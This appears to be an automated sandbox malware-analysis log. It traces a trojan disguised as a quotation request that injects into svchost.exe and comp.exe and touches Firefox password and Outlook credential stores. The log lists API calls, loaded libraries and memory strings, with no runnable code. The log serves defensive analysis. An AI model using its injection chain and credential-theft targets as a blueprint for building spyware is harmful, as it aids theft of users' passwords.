Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72FA0 NtQuerySection,3_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72F90 NtProtectVirtualMemory,3_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72FE0 NtCreateFile,3_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72F30 NtCreateSection,3_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72F60 NtCreateProcessEx,3_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72EA0 NtAdjustPrivilegesToken,3_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72E80 NtReadVirtualMemory,3_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72EE0 NtQueueApcThread,3_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72E30 NtWriteVirtualMemory,3_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72DB0 NtEnumerateKey,3_2_03B72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DD0 NtDelayExecution,3_2_03B72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D30 NtUnmapViewOfSection,3_2_03B72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D10 NtMapViewOfSection,3_2_03B72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D00 NtSetInformationFile,3_2_03B72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CA0 NtQueryInformationToken,3_2_03B72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CF0 NtOpenProcess,3_2_03B72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CC0 NtQueryVirtualMemory,3_2_03B72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C00 NtQueryInformationProcess,3_2_03B72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C60 NtCreateKey,3_2_03B72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73090 NtSetValueKey,3_2_03B73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73010 NtOpenDirectoryObject,3_2_03B73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B739B0 NtGetContextThread,3_2_03B739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73D10 NtOpenProcessToken,3_2_03B73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73D70 NtOpenThread,3_2_03B73D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A4340 NtSetContextThread,LdrInitializeThunk,6_2_009A4340
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A4650 NtSuspendThread,LdrInitializeThunk,6_2_009A4650
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2AD0 NtReadFile,LdrInitializeThunk,6_2_009A2AD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2AF0 NtWriteFile,LdrInitializeThunk,6_2_009A2AF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_009A2BA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_009A2BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_009A2BE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2B60 NtClose,LdrInitializeThunk,6_2_009A2B60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_009A2CA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_009A2C70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2C60 NtCreateKey,LdrInitializeThunk,6_2_009A2C60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2DD0 NtDelayExecution,LdrInitializeThunk,6_2_009A2DD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_009A2DF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_009A2D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_009A2D30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_009A2E80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_009A2EE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2FB0 NtResumeThread,LdrInitializeThunk,6_2_009A2FB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2FE0 NtCreateFile,LdrInitializeThunk,6_2_009A2FE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2F30 NtCreateSection,LdrInitializeThunk,6_2_009A2F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A35C0 NtCreateMutant,LdrInitializeThunk,6_2_009A35C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A39B0 NtGetContextThread,LdrInitializeThunk,6_2_009A39B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2AB0 NtWaitForSingleObject,6_2_009A2AB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2B80 NtQueryInformationFile,6_2_009A2B80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2CC0 NtQueryVirtualMemory,6_2_009A2CC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2CF0 NtOpenProcess,6_2_009A2CF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2C00 NtQueryInformationProcess,6_2_009A2C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2DB0 NtEnumerateKey,6_2_009A2DB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2D00 NtSetInformationFile,6_2_009A2D00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2EA0 NtAdjustPrivilegesToken,6_2_009A2EA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2E30 NtWriteVirtualMemory,6_2_009A2E30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2F90 NtProtectVirtualMemory,6_2_009A2F90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2FA0 NtQuerySection,6_2_009A2FA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2F60 NtCreateProcessEx,6_2_009A2F60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3090 NtSetValueKey,6_2_009A3090
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3010 NtOpenDirectoryObject,6_2_009A3010
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3D10 NtOpenProcessToken,6_2_009A3D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3D70 NtOpenThread,6_2_009A3D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00428FF0 NtCreateFile,6_2_00428FF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00429160 NtReadFile,6_2_00429160
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00429250 NtDeleteFile,6_2_00429250
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004292F0 NtClose,6_2_004292F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00429450 NtAllocateVirtualMemory,6_2_00429450
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0083A1EF
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00828310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00828310
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008351BD
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040AE806_2_0040AE80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004152606_2_00415260
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004134606_2_00413460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0042B9106_2_0042B910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E6EB6_2_02D9E6EB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E4656_2_02D9E465
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E5836_2_02D9E583
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9D9E86_2_02D9D9E8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E91C6_2_02D9E91C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9CC836_2_02D9CC83
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: String function: 007F8900 appears 42 times
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: String function: 007D7DE1 appears 35 times
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: String function: 007F0AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B2B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B87E54 appears 111 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 009A5130 appears 58 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 009EF290 appears 105 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 009B7E54 appears 111 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 0095B970 appears 277 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 009DEA12 appears 86 times
                Source: Quotation Request-349849.exe, 00000000.00000003.1330543235.000000000409D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation Request-349849.exe
                Source: Quotation Request-349849.exe, 00000000.00000003.1329701873.0000000003EF3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation Request-349849.exe
                Source: Quotation Request-349849.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/5
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083A06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_008281CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_008287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0084EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083C397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007D4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | File created: C:\Users\user~1\AppData\Local\Temp\autD4EB.tmp
                Source: Quotation Request-349849.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: comp.exe, 00000006.00000002.2558167888.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2558167888.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quotation Request-349849.exe | ReversingLabs: Detection: 47%
                Source: unknown | Process created: C:\Users\user\Desktop\Quotation Request-349849.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\comp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Quotation Request-349849.exe | Static file information: File size 1201664 > 1048576
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Quotation Request-349849.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LcmEonpIrfS.exe, 00000005.00000002.2557763913.00000000000AE000.00000002.00000001.01000000.00000005.sdmp, LcmEonpIrfS.exe, 00000007.00000000.1802114008.00000000000AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Quotation Request-349849.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Quotation Request-349849.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Quotation Request-349849.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Quotation Request-349849.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Quotation Request-349849.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007D4B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007F8945 push ecx; ret 0_2_007F8958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418B23 pushad ; ret 3_2_00418CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041183B push edi; iretd 3_2_0041183C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004180FB pushfd ; retf 3_2_00418116
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041222A push cs; retf 3_2_0041222F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004122B0 push ecx; retf 3_2_004122BD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004122BF pushfd ; iretd 3_2_004122C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00403350 push eax; ret 3_2_00403352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418C08 pushad ; ret 3_2_00418CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00401552 pushfd ; ret 3_2_00401566
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00408562 push edi; iretd 3_2_00408563
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00408572 push esi; ret 3_2_00408573
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00414503 push FFFFFFB7h; iretd 3_2_00414516
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004165F1 push eax; iretd 3_2_00416603
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004015BB pushfd ; ret 3_2_00401566
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00413E7E push ss; retf 3_2_00413E81
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00408600 push ebp; iretd 3_2_00408601
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040175C pushfd ; ret 3_2_00401778
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418F7A push ecx; iretd 3_2_00418F81
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00424FC3 push edi; iretd 3_2_00424FCE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B309AD push ecx; mov dword ptr [esp], ecx 3_2_03B309B6
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_0093225F pushad ; ret 6_2_009327F9
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_009327FA pushad ; ret 6_2_009327F9
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_0093283D push eax; iretd 6_2_00932858
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_009609AD push ecx; mov dword ptr [esp], ecx 6_2_009609B6
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_00931368 push eax; iretd 6_2_00931369
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_004122A2 push FF5A8F7Dh; ret 6_2_004122AF
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_0040E4E8 push edi; iretd 6_2_0040E4E9
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_004209CB push ebx; retf 6_2_004209CC
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_00410B2B push ss; retf 6_2_00410B2E
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_00414DA8 pushfd ; retf 6_2_00414DC3
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_00855376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
